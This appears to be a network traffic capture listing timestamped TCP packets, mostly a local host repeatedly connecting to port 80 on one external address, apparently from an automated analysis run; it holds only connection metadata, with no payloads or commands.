Sep 28, 2023 06:04:46.038208008 CEST	50290	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:46.138355017 CEST	50290	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:46.138822079 CEST	50292	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:46.332519054 CEST	80	50292	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:46.332807064 CEST	50292	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:46.332921982 CEST	50292	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:46.336085081 CEST	80	50290	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:46.336396933 CEST	50290	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:46.526870966 CEST	80	50292	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:46.531222105 CEST	80	50292	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:46.531400919 CEST	50292	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:46.605355024 CEST	2450	49801	81.19.131.36	192.168.2.3
Sep 28, 2023 06:04:46.606878996 CEST	49801	2450	192.168.2.3	81.19.131.36
Sep 28, 2023 06:04:46.638355017 CEST	50292	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:46.638689041 CEST	50293	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:46.817388058 CEST	2450	49801	81.19.131.36	192.168.2.3
Sep 28, 2023 06:04:46.832693100 CEST	80	50292	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:46.832979918 CEST	50292	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:46.833564997 CEST	80	50293	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:46.833811998 CEST	50293	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:46.833898067 CEST	50293	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:47.028786898 CEST	80	50293	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:47.034050941 CEST	80	50293	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:47.034149885 CEST	50293	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:47.138216972 CEST	50293	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:47.138602018 CEST	50294	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:47.334053993 CEST	80	50293	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:47.334455013 CEST	50293	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:47.336200953 CEST	80	50294	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:47.336535931 CEST	50294	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:47.336622000 CEST	50294	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:47.371124983 CEST	50294	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:47.466913939 CEST	50296	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:47.534212112 CEST	80	50294	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:47.534528017 CEST	50294	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:47.540698051 CEST	80	50294	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:47.540918112 CEST	50294	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:47.662841082 CEST	80	50296	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:47.663166046 CEST	50296	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:47.663249016 CEST	50296	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:47.859117031 CEST	80	50296	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:47.860768080 CEST	80	50296	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:47.861083984 CEST	50296	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:47.967186928 CEST	50296	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:47.967534065 CEST	50298	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:48.161636114 CEST	80	50298	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:48.161938906 CEST	50298	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:48.162058115 CEST	50298	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:48.162512064 CEST	80	50296	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:48.162758112 CEST	50296	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:48.356353045 CEST	80	50298	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:48.361063004 CEST	80	50298	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:48.361367941 CEST	50298	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:48.466449976 CEST	50298	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:48.466773033 CEST	50299	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:48.661720991 CEST	80	50298	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:48.661868095 CEST	50298	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:48.665256977 CEST	80	50299	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:48.665349960 CEST	50299	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:48.665539026 CEST	50299	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:48.862854958 CEST	80	50299	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:48.867399931 CEST	80	50299	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:48.867484093 CEST	50299	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:48.966691017 CEST	50299	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:48.967283964 CEST	50300	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:49.163683891 CEST	80	50300	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:49.163840055 CEST	50300	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:49.163868904 CEST	80	50299	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:49.163965940 CEST	50299	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:49.164072037 CEST	50300	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:49.360500097 CEST	80	50300	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:49.365782976 CEST	80	50300	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:49.366105080 CEST	50300	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:49.466707945 CEST	50300	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:49.470587969 CEST	50302	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:49.664092064 CEST	80	50300	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:49.664335012 CEST	50300	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:49.666608095 CEST	80	50302	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:49.666713953 CEST	50302	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:49.666929960 CEST	50302	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:49.863791943 CEST	80	50302	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:49.866210938 CEST	80	50302	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:49.866281986 CEST	50302	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:49.966825008 CEST	50302	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:49.967355013 CEST	50303	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:50.163799047 CEST	80	50302	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:50.163918018 CEST	80	50303	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:50.164025068 CEST	50303	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:50.164032936 CEST	50302	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:50.164295912 CEST	50303	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:50.361249924 CEST	80	50303	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:50.366040945 CEST	80	50303	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:50.366166115 CEST	50303	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:50.466422081 CEST	50303	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:50.466810942 CEST	50304	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:50.653989077 CEST	80	50304	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:50.654201984 CEST	50304	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:50.654287100 CEST	50304	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:50.662910938 CEST	80	50303	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:50.662976027 CEST	50303	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:50.841478109 CEST	80	50304	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:50.846656084 CEST	80	50304	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:50.846942902 CEST	50304	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:50.951482058 CEST	50304	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:50.951924086 CEST	50305	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:51.139549017 CEST	80	50304	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:51.139857054 CEST	50304	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:51.147041082 CEST	80	50305	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:51.147371054 CEST	50305	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:51.147463083 CEST	50305	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:51.343066931 CEST	80	50305	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:51.348468065 CEST	80	50305	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:51.348762035 CEST	50305	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:51.450809956 CEST	50305	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:51.451024055 CEST	50307	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:51.647555113 CEST	80	50305	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:51.647862911 CEST	50305	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:51.647895098 CEST	80	50307	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:51.648085117 CEST	50307	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:51.648282051 CEST	50307	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:51.845232964 CEST	80	50307	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:51.851526022 CEST	80	50307	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:51.851630926 CEST	50307	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:51.950917006 CEST	50307	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:51.951287031 CEST	50308	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:52.139046907 CEST	80	50308	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:52.139267921 CEST	50308	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:52.139349937 CEST	50308	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:52.147964001 CEST	80	50307	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:52.148161888 CEST	50307	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:52.326555014 CEST	80	50308	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:52.331540108 CEST	80	50308	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:52.331852913 CEST	50308	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:52.435103893 CEST	50308	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:52.435472012 CEST	50309	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:52.622958899 CEST	80	50308	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:52.623259068 CEST	50308	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:52.632728100 CEST	80	50309	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:52.632941961 CEST	50309	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:52.633053064 CEST	50309	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:52.830575943 CEST	80	50309	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:52.836379051 CEST	80	50309	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:52.836452961 CEST	50309	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:52.935617924 CEST	50309	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:52.935978889 CEST	50311	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:53.133167028 CEST	80	50311	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:53.133229017 CEST	80	50309	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:53.133390903 CEST	50309	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:53.133747101 CEST	50311	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:53.133747101 CEST	50311	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:53.331145048 CEST	80	50311	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:53.335608006 CEST	80	50311	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:53.335880041 CEST	50311	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:53.435578108 CEST	50311	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:53.435846090 CEST	50312	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:53.619904041 CEST	80	50312	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:53.620121002 CEST	50312	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:53.620204926 CEST	50312	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:53.632633924 CEST	80	50311	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:53.632863045 CEST	50311	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:53.804263115 CEST	80	50312	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:53.808695078 CEST	80	50312	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:53.808916092 CEST	50312	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:53.906189919 CEST	50312	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:53.906544924 CEST	50313	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:54.090630054 CEST	80	50312	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:54.090907097 CEST	50312	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:54.107291937 CEST	80	50313	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:54.107363939 CEST	50313	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:54.107528925 CEST	50313	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:54.308010101 CEST	80	50313	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:54.312364101 CEST	80	50313	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:54.312510014 CEST	50313	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:54.403907061 CEST	50313	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:54.404365063 CEST	50315	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:54.602411032 CEST	80	50315	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:54.602607012 CEST	50315	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:54.602766037 CEST	50315	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:54.604394913 CEST	80	50313	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:54.604562998 CEST	50313	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:54.800616026 CEST	80	50315	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:54.804971933 CEST	80	50315	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:54.805149078 CEST	50315	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:54.903863907 CEST	50315	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:54.904308081 CEST	50316	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:55.091527939 CEST	80	50316	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:55.091705084 CEST	50316	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:55.091813087 CEST	50316	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:55.101816893 CEST	80	50315	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:55.101912975 CEST	50315	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:55.279594898 CEST	80	50316	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:55.284178019 CEST	80	50316	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:55.284532070 CEST	50316	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:55.372862101 CEST	50316	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:55.373301029 CEST	50317	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:55.560030937 CEST	80	50316	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:55.560245037 CEST	50316	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:55.560704947 CEST	80	50317	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:55.560916901 CEST	50317	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:55.561002016 CEST	50317	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:55.748465061 CEST	80	50317	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:55.752895117 CEST	80	50317	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:55.753079891 CEST	50317	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:55.841451883 CEST	50317	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:55.844108105 CEST	50319	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:56.028753042 CEST	80	50319	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:56.028979063 CEST	50319	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:56.029310942 CEST	50319	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:56.029495001 CEST	80	50317	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:56.029670954 CEST	50317	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:56.213767052 CEST	80	50319	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:56.221133947 CEST	80	50319	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:56.221415997 CEST	50319	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:56.310245037 CEST	50319	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:56.311372042 CEST	50320	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:56.495107889 CEST	80	50319	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:56.495323896 CEST	50319	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:56.507745981 CEST	80	50320	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:56.508060932 CEST	50320	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:56.508163929 CEST	50320	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:56.705730915 CEST	80	50320	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:56.707427025 CEST	80	50320	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:56.707590103 CEST	50320	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:56.794344902 CEST	50320	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:56.794750929 CEST	50321	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:56.979866982 CEST	80	50321	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:56.979969978 CEST	50321	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:56.980299950 CEST	50321	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:56.990885019 CEST	80	50320	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:56.991151094 CEST	50320	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:57.164974928 CEST	80	50321	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:57.170166016 CEST	80	50321	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:57.170258999 CEST	50321	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:57.263231993 CEST	50321	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:57.263461113 CEST	50323	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:57.448999882 CEST	80	50321	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:57.449373960 CEST	50321	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:57.451307058 CEST	80	50323	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:57.451504946 CEST	50323	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:57.451596975 CEST	50323	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:57.638936996 CEST	80	50323	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:57.644593954 CEST	80	50323	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:57.644895077 CEST	50323	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:57.733330011 CEST	50323	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:57.733839035 CEST	50324	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:57.921088934 CEST	80	50323	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:57.921288967 CEST	50323	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:57.933415890 CEST	80	50324	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:57.933589935 CEST	50324	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:57.933793068 CEST	50324	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:58.133371115 CEST	80	50324	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:58.136239052 CEST	80	50324	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:58.136496067 CEST	50324	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:58.232198954 CEST	50324	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:58.232613087 CEST	50325	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:58.426955938 CEST	80	50325	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:58.427062988 CEST	50325	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:58.427254915 CEST	50325	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:58.432080984 CEST	80	50324	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:58.432305098 CEST	50324	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:58.622064114 CEST	80	50325	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:58.623131990 CEST	80	50325	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:58.623262882 CEST	50325	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:58.729988098 CEST	50325	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:58.730624914 CEST	50326	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:58.918812990 CEST	80	50326	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:58.919131994 CEST	50326	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:58.919276953 CEST	50326	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:58.924391985 CEST	80	50325	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:58.924562931 CEST	50325	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:59.107649088 CEST	80	50326	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:59.115701914 CEST	80	50326	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:59.115776062 CEST	50326	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:59.216413975 CEST	50326	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:59.216869116 CEST	50328	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:59.404970884 CEST	80	50326	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:59.405261040 CEST	50326	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:59.409709930 CEST	80	50328	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:59.409935951 CEST	50328	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:59.410105944 CEST	50328	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:59.603344917 CEST	80	50328	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:59.607554913 CEST	80	50328	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:59.607908010 CEST	50328	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:59.700762987 CEST	50328	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:59.701064110 CEST	50329	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:59.893929005 CEST	80	50328	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:59.894007921 CEST	50328	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:59.905760050 CEST	80	50329	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:59.905953884 CEST	50329	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:59.906055927 CEST	50329	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:00.110878944 CEST	80	50329	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:00.115648031 CEST	80	50329	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:00.115966082 CEST	50329	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:00.216521978 CEST	50329	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:00.216713905 CEST	50330	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:00.412720919 CEST	80	50330	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:00.412899971 CEST	50330	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:00.413094997 CEST	50330	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:00.421396017 CEST	80	50329	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:00.421576977 CEST	50329	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:00.609131098 CEST	80	50330	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:00.613894939 CEST	80	50330	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:00.614083052 CEST	50330	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:00.700839043 CEST	50330	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:00.701212883 CEST	50332	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:00.888179064 CEST	80	50332	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:00.888309002 CEST	50332	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:00.888618946 CEST	50332	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:00.897221088 CEST	80	50330	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:00.897294044 CEST	50330	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:01.076088905 CEST	80	50332	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:01.082246065 CEST	80	50332	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:01.082623005 CEST	50332	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:01.169943094 CEST	50332	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:01.170485020 CEST	50333	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:01.356925964 CEST	80	50332	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:01.357109070 CEST	50332	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:01.364042044 CEST	80	50333	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:01.364310026 CEST	50333	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:01.364639044 CEST	50333	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:01.558541059 CEST	80	50333	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:01.559844017 CEST	80	50333	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:01.560125113 CEST	50333	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:01.654064894 CEST	50333	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:01.654386997 CEST	50334	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:01.844949961 CEST	80	50334	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:01.845236063 CEST	50334	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:01.845313072 CEST	50334	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:01.847676039 CEST	80	50333	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:01.847762108 CEST	50333	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:02.035729885 CEST	80	50334	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:02.037111044 CEST	80	50334	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:02.037252903 CEST	50334	80	192.168.2.3	95.141.41.12
